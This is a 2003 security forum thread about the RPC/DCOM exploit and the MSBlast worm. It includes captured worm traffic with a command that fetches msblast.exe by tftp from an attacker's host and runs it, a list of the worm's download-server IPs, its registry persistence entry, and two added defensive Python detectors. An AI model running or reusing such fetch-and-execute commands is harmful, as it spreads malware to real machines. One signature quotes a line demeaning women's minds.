
Thread: RPC / DCom exploit

  1. #21
    Member | Join Date: Feb 2003 | Posts: 96
    Hmph, I found it interesting that this thread re-appeared today. I work as a Computer Tech at a local shop and we had about 12 phone calls and 4 computers come in today for errors due to this exploit. It seemed that it would cause a svchost error and then reboot in 60 seconds, related to RPC. I found the patches mentioned above and they seemed to take care of any and all problems.

    Note: The computers all had the DSO exploit on them as well when I ran Spybot.

    LINK: Microsoft Support Download Windows XP

    my2cents
    ][ neta1o ][

  2. #22
    Senior Member | Join Date: May 2003 | Posts: 207
    yea... about 30 seconds ago my friend was having an attack, every time he booted his computer up.. he had to call me cause he unplugged his ethernet cable...

    this is a very problematic exploit, if i must say so myself

  3. #23
    Junior Member | Join Date: Apr 2003 | Posts: 9
    lmao, yea it is, i have been thinking whether i should make a script that connects to all IPs, 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even though i fixed their computers without any intent to harm them i still can go to jail just by entering..
    Tha all mity Rodent!

  4. #24
    Hi people!
    Hispasec (www.hispasec.com) reports today a new worm based on the RPC exploit...
    The worm sends commands to the Windows shell on tcp port 4444.
    Here is the captured traffic...

    -------------traffic 4444/tcp----------
    tftp -i aaa.bbb.ccc.ddd GET msblast.exe
    start msblast.exe
    msblast.exe
    HTTP/1.0 403 Forbidden
    Server: AdSubtract 2.50
    Content-Type: text/html;charset=utf-8
    Content-Length: 349

    <html>
    <head>
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
    <title>Forbidden</title>
    </head>
    <body>
    <h1>Forbidden</h1>
    <h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
    allowed; only requests from localhost (127.0.0.1) are allowed.
    </h2>
    </body></html>
    -------------traffic 4444/tcp----------

    msblast.exe is a Windows file, 6 KB in length.
    MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

    The download is from these tftp servers:

    204.210.57.87
    217.211.179.193
    24.147.64.171
    24.147.64.205
    24.147.64.208
    24.147.65.146
    24.147.65.45
    24.147.65.9
    61.254.65.159
    67.119.36.219
    68.112.65.38
    68.166.102.136
    68.166.107.21
    68.166.111.175
    68.166.120.34
    68.166.121.135
    68.166.123.4
    68.166.124.186
    68.166.124.93
    68.166.139.155
    68.166.139.210
    68.166.141.66
    68.166.142.194
    68.166.142.215
    68.166.36.178
    68.166.56.123
    68.166.60.51
    68.166.98.3

    The worm makes an entry in the Windows registry:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

    "windows auto update"="msblast.exe"

    Keep the eyes open!!

    See u!
    Groby
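
    The infection sequence Groby lays out above (commands over tcp/4444, a tftp fetch of msblast.exe back from the attacker, then a Run key entry) is exactly the kind of thing a defender can correlate from firewall logs and a registry export. The block below is an added example written for this edit, not code from the thread, from Hispasec or from any vendor; the log line format, the log lines and the .reg-style export are constructed, while the port numbers, registry value, MD5 and file size are the ones quoted in the post.

```python
import hashlib
import re
from datetime import datetime, timedelta

# Indicators quoted in the post above
SHELL_PORT = 4444                # worm's command shell, tcp
TFTP_PORT = 69                   # victim fetches msblast.exe from the attacker's tftp server, udp
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = ("windows auto update", "msblast.exe")
KNOWN_MD5 = "5ae700c1dffb00cef492844a4db6cd69"
KNOWN_SIZE = 6176

# Constructed firewall-style log lines (hypothetical format: "date time proto src:sport -> dst:dport").
# 10.9.8.7 hits 10.1.1.20 on 135, connects to the shell on 4444, and 10.1.1.20 fetches the
# payload back from 10.9.8.7 by tftp. 10.1.1.30 only sees a 4444 connection (could be a
# legitimate AdSubtract proxy); 10.1.1.40 only makes an unrelated tftp request.
SAMPLE_LOG = """\
2003-08-11 14:02:10 tcp 10.9.8.7:1052 -> 10.1.1.20:135
2003-08-11 14:02:11 tcp 10.9.8.7:1053 -> 10.1.1.20:4444
2003-08-11 14:02:12 udp 10.1.1.20:1029 -> 10.9.8.7:69
2003-08-11 14:05:00 tcp 10.2.2.2:2000 -> 10.1.1.30:4444
2003-08-11 14:30:00 udp 10.1.1.40:1111 -> 10.3.3.3:69
"""

LINE_RE = re.compile(
    r"^(\S+ \S+) (tcp|udp) (\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)


def parse_log(text):
    """Parse the constructed log format into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "proto": m.group(2),
            "src": m.group(3),
            "dst": m.group(4),
            "dport": int(m.group(5)),
        })
    return events


def find_shell_then_tftp(events, window=timedelta(minutes=5)):
    """Return (victim, attacker) pairs where an inbound tcp/4444 connection from the attacker
    is followed within `window` by a udp/69 request from the victim back to that attacker.
    A lone 4444 connection is not enough on its own: AdSubtract also listens on 4444."""
    hits = []
    for shell in events:
        if shell["proto"] != "tcp" or shell["dport"] != SHELL_PORT:
            continue
        for fetch in events:
            if (fetch["proto"] == "udp" and fetch["dport"] == TFTP_PORT
                    and fetch["src"] == shell["dst"] and fetch["dst"] == shell["src"]
                    and shell["ts"] <= fetch["ts"] <= shell["ts"] + window):
                hits.append((shell["dst"], shell["src"]))
                break
    return hits


def run_key_has_worm_entry(reg_text):
    """Scan a .reg-style export for the Run value quoted in the post (case-insensitive)."""
    in_run_key = False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_run_key = line.strip("[]").lower() == RUN_KEY.lower()
        elif in_run_key:
            m = re.match(r'"([^"]*)"="([^"]*)"$', line)
            if m and (m.group(1).lower(), m.group(2).lower()) == RUN_VALUE:
                return True
    return False


def is_known_sample(data):
    """Match a file's bytes against the size and MD5 quoted in the post."""
    return len(data) == KNOWN_SIZE and hashlib.md5(data).hexdigest() == KNOWN_MD5


# Constructed registry export; the second value is the worm's persistence entry.
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SomeUpdater"="C:\\Program Files\\Some Vendor\\updater.exe"
"windows auto update"="msblast.exe"
"""

if __name__ == "__main__":
    print(find_shell_then_tftp(parse_log(SAMPLE_LOG)))   # [('10.1.1.20', '10.9.8.7')]
    print(run_key_has_worm_entry(SAMPLE_REG))            # True
    print(is_known_sample(b"not the worm"))              # False
```

    The correlation deliberately requires the tftp request to go back to the same host that opened the 4444 connection; that is what separates an infected machine from a box that merely has an AdSubtract proxy listening, a distinction a later post in this thread raises.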

  5. #25
    Senior Member | Join Date: Nov 2001 | Posts: 4,785
    nebulus200 already reported it here:

    http://www.antionline.com/showthread...226#post651989

    although yours has some updated info. thanks!

    you know you gotta feel sorry for the guy that looks at this list and says... my god... that's my IP address!
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  6. #26
    Senior Member | Join Date: May 2003 | Posts: 207
    Originally posted here by Chinchilla06
    lmao, yea it is, i have been thinking whether i should make a script that connects to all IPs, 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even though i fixed their computers without any intent to harm them i still can go to jail just by entering..
    yea, I don't think that'd be such a good idea

  7. #27
    Most of the servers are in covad.net and attbi.com. The others are in san.rr.com and lsan03.pacbell.net. I believe that this could indicate where the worm began to spread from.

  8. #28
    Senior Member | Join Date: Apr 2002 | Posts: 889
    Well, as the debate rages, I understand Ted's point from the fact that (and I'm not dissing anyone here) he speaks from the trenches of an actual work environment, and that many tech workers do not understand. Ya got it: Covad, Comcast, ATT etc. are all infected with a worm on systems sold out of the box and subscribed to services by the above that make no mention nor provide a simple out-of-the-box firewall as you buy the service, from either M$ or ISP, yet day to day the "NOISE" of script kiddies and auto worms grows. Me, I watch the logs and filter out the latest worm, put in my 8 hours and have a life outside the server room. Tweak away, I'll only see the tweaks; those I'll watch. Where the worm grows, hell, today on my home system 600 hits, think I'll bother to take notice other than another unusual spike? Oops, did not make sense again LOL.. Simple firewall takes care of it; if it's blocked why sweat it... hope they did not deface the ProzacPez page
    I believe that one of the characteristics of the human race - possibly the one that is primarily responsible for its course of evolution - is that it has grown by creatively responding to failure.- Glen Seaborg

  9. #29
    Senior Member | Join Date: Nov 2001 | Posts: 4,785
    I just scanned a subnet of Verizon's where I have a remote location. I got one hit on 4444. Did a GET /http1.0 and got the AdSubtract response, and stopped at that.

    Does anyone know if this worm is using the AdSubtract proxy as one of its components, like some IRC backdoors use mIRC, or is it just trying to appear like an AdSubtract server (which also listens on port 4444) to avoid detection? Even though chances of that are slim to none now.

    I'm tempted (but not convinced) to d/l the damned thing just to join the MS party on Saturday.

    palemoon! How in hell are you? Haven't seen you in a coon's age!

  10. #30
    I did some scanning for open port 4444 and it came up with about 1%-2% on my ISP with that port open, but that doesn't mean that the machines are infected, because lots of applications use TFTP.

    The IP address ranges used seem to be the same as the original probing scans, meaning that the worm concentrates on a sort of Class B subnet of 65,536 hosts relative to itself, so if the infected PC has an IP of 12.34.56.78, it will spend most of its time scanning 12.34.x.x, some additional time scanning 12.x.x.x and then a quite small amount of time on random scanning. This is pretty similar to Code Red.

    The worm will also survive a reboot (unlike Code Red). This means that it's possible for an infected laptop to bring the worm into a corporate environment if used on an insecure ISP connection and then brought into the office, neatly getting around the firewall. The scanning pattern would then be very effective at infecting a corporate network.

    Reports indicate that this seems to impact XP and 2000, but not NT.

    There also appears to be no email component to this. A major threat would be if this kind of worm was combined with an email mass-mailer. Maybe the next version of this will have a mass-mailer. In any case, continue patching even if your firewall is holding.

    I'm getting several probes per minute at the moment on this, I don't know about anyone else.
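
    The local-preference scanning described in the post above (most probes into the worm's own /16, some into its /8, a little random) has a useful defensive consequence: if your 135/tcp probes come mostly from addresses inside your own /16, the infected hosts are your own neighbours, and the laptop-through-the-firewall scenario is already in progress. The block below is an added example written for this edit, not code from the thread; the probe record format and the records themselves are constructed, and the site network 12.34.0.0/16 is the post's own example prefix.

```python
import ipaddress
from collections import Counter, defaultdict

RPC_PORT = 135   # the port the worm probes before exploiting a host

# Constructed probe records (hypothetical format: "src dst dport"), as seen by a site owning
# 12.34.0.0/16. 12.34.5.6 shows the local-preference pattern (mostly 12.34.x.x targets, one
# 12.x.x.x target); 66.1.2.3 is a remote infected host that landed on us by random scanning;
# 12.34.7.7 only touched 4444 and is not a 135 probe, so it is dropped.
SAMPLE_PROBES = """\
12.34.5.6 12.34.0.10 135
12.34.5.6 12.34.0.11 135
12.34.5.6 12.34.77.3 135
12.34.5.6 12.34.200.9 135
12.34.5.6 12.99.1.1 135
66.1.2.3 12.34.0.10 135
12.34.7.7 12.34.0.10 4444
"""


def locality(src, dst):
    """Classify a probe by how close the target is to the source: same /16, same /8 or other."""
    target = ipaddress.ip_address(dst)
    if target in ipaddress.ip_network(f"{src}/16", strict=False):
        return "same_16"
    if target in ipaddress.ip_network(f"{src}/8", strict=False):
        return "same_8"
    return "other"


def classify_probes(text):
    """Per-source Counter of 135/tcp probes keyed by locality; non-135 records are ignored."""
    by_src = defaultdict(Counter)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        src, dst, dport = parts
        if int(dport) != RPC_PORT:
            continue
        by_src[src][locality(src, dst)] += 1
    return by_src


def likely_internal_infections(by_src, our_net, min_probes=3):
    """Sources inside our own network that probe 135 repeatedly. Given the worm's preference
    for its own /16, these are the hosts to pull off the wire and patch first."""
    net = ipaddress.ip_network(our_net)
    return sorted(
        src for src, counts in by_src.items()
        if ipaddress.ip_address(src) in net and sum(counts.values()) >= min_probes
    )


if __name__ == "__main__":
    stats = classify_probes(SAMPLE_PROBES)
    for src, counts in stats.items():
        print(src, dict(counts))
    print(likely_internal_infections(stats, "12.34.0.0/16"))   # ['12.34.5.6']
```

    The threshold of three probes is an arbitrary constructed value; the point is that a single external source probing you is the background noise other posters describe, while an internal source with a same-/16 skew is the signature of the scanning pattern this post lays out.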
